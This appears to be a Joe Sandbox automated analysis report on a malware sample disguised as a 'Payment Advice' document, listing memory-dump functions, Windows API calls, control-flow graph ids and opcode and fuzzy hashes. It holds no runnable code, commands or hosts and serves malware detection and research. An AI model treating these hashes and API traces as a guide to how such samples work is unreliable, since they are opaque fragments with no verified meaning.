                                                                                                                                            • Opcode ID: 46e1a4553f661cbf0329e4193b5def1e431d8119470060abc7436dbcaad6e531
                                                                                                                                            • Instruction ID: 062e8d1c05445e30febb3e16b18b5f353131ccf180cb52c98c1726a86000edb9
                                                                                                                                            • Opcode Fuzzy Hash: 46e1a4553f661cbf0329e4193b5def1e431d8119470060abc7436dbcaad6e531
                                                                                                                                            • Instruction Fuzzy Hash: 8241B1B1D003599FDF14CF99C984ADEBBB5FF48310F24812AE818AB220DB75A945CF91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2815 4d51264-4d542fc 2818 4d54302-4d54307 2815->2818 2819 4d543ac-4d543cc call 4d5113c 2815->2819 2820 4d54309-4d54340 2818->2820 2821 4d5435a-4d54392 CallWindowProcW 2818->2821 2826 4d543cf-4d543dc 2819->2826 2829 4d54342-4d54348 2820->2829 2830 4d54349-4d54358 2820->2830 2824 4d54394-4d5439a 2821->2824 2825 4d5439b-4d543aa 2821->2825 2824->2825 2825->2826 2829->2830 2830->2826
                                                                                                                                            APIs
                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D54381
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                            • Opcode ID: 404e2258d4ec7394a2c0ba9639e0b0f571d13eee1c7ffdebcef84018787a757b
                                                                                                                                            • Instruction ID: 4a84d94ffe07331aa67ba15f4db41531a8d7e449a115f90392eb6fe3ef75c7d7
                                                                                                                                            • Opcode Fuzzy Hash: 404e2258d4ec7394a2c0ba9639e0b0f571d13eee1c7ffdebcef84018787a757b
                                                                                                                                            • Instruction Fuzzy Hash: AE4105B4A002199FDB14DF99C488BAABBF5FF88314F24C459D519AB321D774E881CFA1

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2832 25b44b0-25b59d9 CreateActCtxA 2836 25b59db-25b59e1 2832->2836 2837 25b59e2-25b5a3c 2832->2837 2836->2837 2844 25b5a4b-25b5a4f 2837->2844 2845 25b5a3e-25b5a41 2837->2845 2846 25b5a51-25b5a5d 2844->2846 2847 25b5a60 2844->2847 2845->2844 2846->2847 2849 25b5a61 2847->2849 2849->2849
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 81cbe7c5df0fb838b4fa0d7a91db81195822d019634d98081daa6d0f3d7acae2
                                                                                                                                            • Instruction ID: b6ff4c6ad8ccda594305d3ccb4b768372a8d2617d4ee7f8b07e12ad33435e5d1
                                                                                                                                            • Opcode Fuzzy Hash: 81cbe7c5df0fb838b4fa0d7a91db81195822d019634d98081daa6d0f3d7acae2
                                                                                                                                            • Instruction Fuzzy Hash: F041F2B0D00719CBDB24CFA9C9847CDBBB5BF49304F64806AD408BB255EB756949CF90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2850 25b5913-25b598c 2851 25b598f-25b59d9 CreateActCtxA 2850->2851 2853 25b59db-25b59e1 2851->2853 2854 25b59e2-25b5a3c 2851->2854 2853->2854 2861 25b5a4b-25b5a4f 2854->2861 2862 25b5a3e-25b5a41 2854->2862 2863 25b5a51-25b5a5d 2861->2863 2864 25b5a60 2861->2864 2862->2861 2863->2864 2866 25b5a61 2864->2866 2866->2866
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 13e5636048b8d6acb7f74496bef6253e59a0592e2ca597187644d845ee140444
                                                                                                                                            • Instruction ID: 01642aee5d8013e65d90a08aa69ea85d03c2e5fe5a886b671e9dbf9fb184fca7
                                                                                                                                            • Opcode Fuzzy Hash: 13e5636048b8d6acb7f74496bef6253e59a0592e2ca597187644d845ee140444
                                                                                                                                            • Instruction Fuzzy Hash: 3841E2B0D00719CFDB24DFA9C9847CEBBB5BF49304F24806AD408AB255DB75698ACF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f577daacc964fda3c16deda69961c45edd5c6557e142b40c20a00c26a3e4c0c4
                                                                                                                                            • Instruction ID: 8d87444242eb7370f360f2200fddd56d1d7b36e8761b4eec80d999b8f0cae95b
                                                                                                                                            • Opcode Fuzzy Hash: f577daacc964fda3c16deda69961c45edd5c6557e142b40c20a00c26a3e4c0c4
                                                                                                                                            • Instruction Fuzzy Hash: 6731CFB080424DCFDB06CFA8C8547EDBBF1FF4A308FA44199C045AB255E775998ACB45
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                            • Opcode ID: 103909ce84a949db7cbe731dbe5fce68bbddff6395686b287ae9bebf8e47d77a
                                                                                                                                            • Instruction ID: 126b1066205c54855208ccc16b01fa391077ceacf496ed3cb8dcfc5c6adf2592
                                                                                                                                            • Opcode Fuzzy Hash: 103909ce84a949db7cbe731dbe5fce68bbddff6395686b287ae9bebf8e47d77a
                                                                                                                                            • Instruction Fuzzy Hash: B4319CB2904359DFCB11DFA9C844ADEBFF8EF09310F14809AE954A7221C3359950DFA0
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BD66E,?,?,?,?,?), ref: 025BD72F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 3bcbe29ce79183c3ea3996938eadd5f73dc85f0c159870b65949d85c415fa324
                                                                                                                                            • Instruction ID: 1ada9a0fcb0b95cb5ed16cbc8e9184bd077fad907911c3b836f9190509c77748
                                                                                                                                            • Opcode Fuzzy Hash: 3bcbe29ce79183c3ea3996938eadd5f73dc85f0c159870b65949d85c415fa324
                                                                                                                                            • Instruction Fuzzy Hash: F421E3B5901248AFDB10CFAAD584AEEBFF4FF48320F14841AE958A7350D374A940CFA4
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BD66E,?,?,?,?,?), ref: 025BD72F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 594e79e42073cd1fc382cd0b7449d1cfddf9b57a9f2d6687b4f975b60a6c9acc
                                                                                                                                            • Instruction ID: 240e21509ab574cd654ecd72fa60588efc1981a25cdadb58220fa176e96607fa
                                                                                                                                            • Opcode Fuzzy Hash: 594e79e42073cd1fc382cd0b7449d1cfddf9b57a9f2d6687b4f975b60a6c9acc
                                                                                                                                            • Instruction Fuzzy Hash: C821E2B5901248AFDB10CFAAD584ADEBFF4FF48320F14841AE918A7310D374A940CFA4
                                                                                                                                            APIs
                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06BE2E6A,?,?,?,?,?), ref: 06BE2F0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                            • Opcode ID: 67191886f8451a1b04b18a0589b5c4fe5bbc701e775ad5a41fe24128d36e1f42
                                                                                                                                            • Instruction ID: 3f120e0c909b533f8a135bb295c8479e023271c3c6d83b56b2704d1e5cdc341e
                                                                                                                                            • Opcode Fuzzy Hash: 67191886f8451a1b04b18a0589b5c4fe5bbc701e775ad5a41fe24128d36e1f42
                                                                                                                                            • Instruction Fuzzy Hash: 621129B58003599FDB10DF99C844BDEBFF8EF48310F14845AE954A7210D379A950DFA4
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB41E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 51a82160d83f3eee89d054e024ffa5e2fb1a30643499ca31a08504f19ed389d1
                                                                                                                                            • Instruction ID: 14c53b839d15ef97d1d65ef09eac3fdcc5451f884b7a6cad94abae9cf1bc98ef
                                                                                                                                            • Opcode Fuzzy Hash: 51a82160d83f3eee89d054e024ffa5e2fb1a30643499ca31a08504f19ed389d1
                                                                                                                                            • Instruction Fuzzy Hash: 3B110FB5C002498FCB10CF9AC444ADEFBF5BF88228F14842AD818A7210C3B5A545CFA5
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB41E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 24cdee00bf6763e9438c75ca9c03f67ace3c7ab24e0db608fca5ac2e8fac1ecc
                                                                                                                                            • Instruction ID: def73ebefd9480acfdb7fbc425854df3ee12b6d92ed3968f97f5b4a5dbd3cdd4
                                                                                                                                            • Opcode Fuzzy Hash: 24cdee00bf6763e9438c75ca9c03f67ace3c7ab24e0db608fca5ac2e8fac1ecc
                                                                                                                                            • Instruction Fuzzy Hash: 3C1110B5C002498FCB10CF9AD444ADEFBF5FF88328F14842AD828A7210C3B5A545CFA5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (bq
                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                            • Opcode ID: b52ffca218ec7452b97bca399ab0d1a258b17e499ff4f16828ebe498e32eafba
                                                                                                                                            • Instruction ID: d734989b21eceb9ca4322cee968623297c8ff6cd0892fca55986fcb0f3b55af7
                                                                                                                                            • Opcode Fuzzy Hash: b52ffca218ec7452b97bca399ab0d1a258b17e499ff4f16828ebe498e32eafba
                                                                                                                                            • Instruction Fuzzy Hash: D051E470A06218DFDB18EF74E8549AEBFB2FF85300F14846AE441A7651DF34AD26CB61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: d8cq
                                                                                                                                            • API String ID: 0-3601494702
                                                                                                                                            • Opcode ID: cb947b8490fbc7dbef4ada696face9676fce4b19451b8f458e289294756516e3
                                                                                                                                            • Instruction ID: befd3a8a9640627ca64e6c681ea1a62911dec58918ebd3b5fa672f01b5570e87
                                                                                                                                            • Opcode Fuzzy Hash: cb947b8490fbc7dbef4ada696face9676fce4b19451b8f458e289294756516e3
                                                                                                                                            • Instruction Fuzzy Hash: 1E618F35B001199FCB14DF68D858AAE7BF2FF88711F118069E902AB3A0DB75ED51CB90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Te^q
                                                                                                                                            • API String ID: 0-671973202
                                                                                                                                            • Opcode ID: db2251168ed1ce5463eb2352641e4a7ee18530a11bea3289e81432357833a287
                                                                                                                                            • Instruction ID: cf4fa582b567dca41d3a429e83e9d96a218b510bdcb903058c96b84027b68585
                                                                                                                                            • Opcode Fuzzy Hash: db2251168ed1ce5463eb2352641e4a7ee18530a11bea3289e81432357833a287
                                                                                                                                            • Instruction Fuzzy Hash: B341AF31B002058FCB15EF79D8588BEBBF6FFC5210B148969E469DB391EB30AD058B91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq
                                                                                                                                            • API String ID: 0-1245868
                                                                                                                                            • Opcode ID: bea96945b017e926a55843690036888f3694051b52d063309f7617d793b369bd
                                                                                                                                            • Instruction ID: 60315ac8848d291fc48166bf4443e0b97e5d47e7bd557b5e0952970dca9ef75b
                                                                                                                                            • Opcode Fuzzy Hash: bea96945b017e926a55843690036888f3694051b52d063309f7617d793b369bd
                                                                                                                                            • Instruction Fuzzy Hash: 6F311635E10209EFDB05EFA4D8589AEBBB7FF84310F104569E5066B390DF34A845CB91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            • Opcode ID: b2fb4eae68552c5633f43c587e5c9744bb58528f7a2aadee58ba4c5da5c3e4cd
                                                                                                                                            • Instruction ID: 5789629314098e42c288ed150b5fb8160d97787455afd4faacfee76f17c2b742
                                                                                                                                            • Opcode Fuzzy Hash: b2fb4eae68552c5633f43c587e5c9744bb58528f7a2aadee58ba4c5da5c3e4cd
                                                                                                                                            • Instruction Fuzzy Hash: 46210671B002118FDF16AB78848047E7FB2EF85214B0440AEE509DF395DF75ED5687A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            • Opcode ID: d2e64846620027b5fbe6a4ac9ebc577071ef474a8eff5f7c147f955f1a5ab0a3
                                                                                                                                            • Instruction ID: d01e706d3a8b15df18d28bef6ac4240dab07d8422b2fd04247cda571a12c5e93
                                                                                                                                            • Opcode Fuzzy Hash: d2e64846620027b5fbe6a4ac9ebc577071ef474a8eff5f7c147f955f1a5ab0a3
                                                                                                                                            • Instruction Fuzzy Hash: 4611E771B00205CFDF16AB78849067E7BB2EF85208F0040AFDA08DB281DB75A966C765
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 987e01b5943ba6e6d30756b8a8e8e86f4e0ffe057493ec7fd28c4b5886bf91d6
                                                                                                                                            • Instruction ID: 0e28f044b99b6ea12c118cc594f716be4039b8b25c5345034975d15f9fe744e4
                                                                                                                                            • Opcode Fuzzy Hash: 987e01b5943ba6e6d30756b8a8e8e86f4e0ffe057493ec7fd28c4b5886bf91d6
                                                                                                                                            • Instruction Fuzzy Hash: 61B19270B002199FCB05DF68D864AAE7BB7FF88340F148429E8069B394DB74ED56CB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0b9cb7fd49dec63ce814bd3098526fd246671e3bf9ce250fa3b48b0b1681b96f
                                                                                                                                            • Instruction ID: 44d02ac4478a4481e30917a347ad74a28bcb5be86eccb12bde66b742a7581100
                                                                                                                                            • Opcode Fuzzy Hash: 0b9cb7fd49dec63ce814bd3098526fd246671e3bf9ce250fa3b48b0b1681b96f
                                                                                                                                            • Instruction Fuzzy Hash: 28C1B074E01228CFDB24CFA9C884BDDBBB2FF49300F1485A9E459A7251DB74AA85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 90c3b5f98377ab3c1127fc40ff62f27ef5f2f8af175074b007899168ddc43dd2
                                                                                                                                            • Instruction ID: 8dca96f77409a36d1e8a805980be2378e6a992867ebbec6b090c9846eeecf148
                                                                                                                                            • Opcode Fuzzy Hash: 90c3b5f98377ab3c1127fc40ff62f27ef5f2f8af175074b007899168ddc43dd2
                                                                                                                                            • Instruction Fuzzy Hash: 7981B2347106148FCB14EF28D598A697BF6FF89B04B1581AAE606CB375DB71EC42CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4bbb512c22c25064bcfe6ec85cf0064f2bde5ca02e590a7d5f1125acac1cf3a0
                                                                                                                                            • Instruction ID: 28b735abf3be69241040e01d87161d4cbf9197caed1ea9d7e79fdd8a0ce2bc42
                                                                                                                                            • Opcode Fuzzy Hash: 4bbb512c22c25064bcfe6ec85cf0064f2bde5ca02e590a7d5f1125acac1cf3a0
                                                                                                                                            • Instruction Fuzzy Hash: 1C818335A10208DFCB04EFA4D8989ADBBB5FF89301F118559E542AB364EB70ED55CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1f97bfdb27cabafe825a605e61d0584683f5fc11fb5f4307f86d51335f97ddca
                                                                                                                                            • Instruction ID: 161f5fe3c19b15e6437979fa4908c06e4b2bf1238652b710da0d68fa628a2d7f
                                                                                                                                            • Opcode Fuzzy Hash: 1f97bfdb27cabafe825a605e61d0584683f5fc11fb5f4307f86d51335f97ddca
                                                                                                                                            • Instruction Fuzzy Hash: F0517E71E102499FCF14EFA9C944AAFBBF5EF88310F10842AE455E3351EB34A9158BA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ddfc39a69e96aa6b0a2d9e084bf6e8efdf56893fefc02cde4069c9a481ebc46c
                                                                                                                                            • Instruction ID: 4582d92861757782744c6b5f985e48d1fed772ac00cd86bed4f050aac6766c86
                                                                                                                                            • Opcode Fuzzy Hash: ddfc39a69e96aa6b0a2d9e084bf6e8efdf56893fefc02cde4069c9a481ebc46c
                                                                                                                                            • Instruction Fuzzy Hash: DF416630B54258AFDB14DF69C894EADBBF6BF89305F1440A9E501EB3A2DB31E810CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 62f356e30387d9bb88b25bd76e33e9348af651b332d0a5540fadc0959aa51ed9
                                                                                                                                            • Instruction ID: 936cd2943028756f97e846f5f83247ce95dc73a1f229653bf5ab7d42bee14584
                                                                                                                                            • Opcode Fuzzy Hash: 62f356e30387d9bb88b25bd76e33e9348af651b332d0a5540fadc0959aa51ed9
                                                                                                                                            • Instruction Fuzzy Hash: 7B418735E00109DFDB14EF74C4547AD7AB2EF48318F14442AD61267344DF79A992CBA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 573ba6abfb06ecdf16ba31ad14327ab4f37a5693c84319a11c8640621275d5e7
                                                                                                                                            • Instruction ID: b630e97df14846fb236617810aea25c1c08f83a432cb777fa4370363d6aba5f6
                                                                                                                                            • Opcode Fuzzy Hash: 573ba6abfb06ecdf16ba31ad14327ab4f37a5693c84319a11c8640621275d5e7
                                                                                                                                            • Instruction Fuzzy Hash: 0A41187060011A9FCF059F64D864AAEBBA6FF84341F188529E80697394DB75EC66CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4ca39ba7aad68756a5de32128bbe65302fe36ea7b6e9ec5ee810495eab0b28e9
                                                                                                                                            • Instruction ID: cdaf8a9de26e89c08399c6db90edc699d751f220e4d5bb95ce06b9beaaa4cc01
                                                                                                                                            • Opcode Fuzzy Hash: 4ca39ba7aad68756a5de32128bbe65302fe36ea7b6e9ec5ee810495eab0b28e9
                                                                                                                                            • Instruction Fuzzy Hash: C5414131E20609DFCB04EFB8D954ADDBBB1FF49301F508269E94577250EB30AA99CB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d4be9e795a9a4e927d482d6feb1890a9d8dbfa21b09f045059a03bfb611201e2
                                                                                                                                            • Instruction ID: 600cf3eae7752bcf2ca3c6a937eb42e1427553f35a77207a0d139db8604741e1
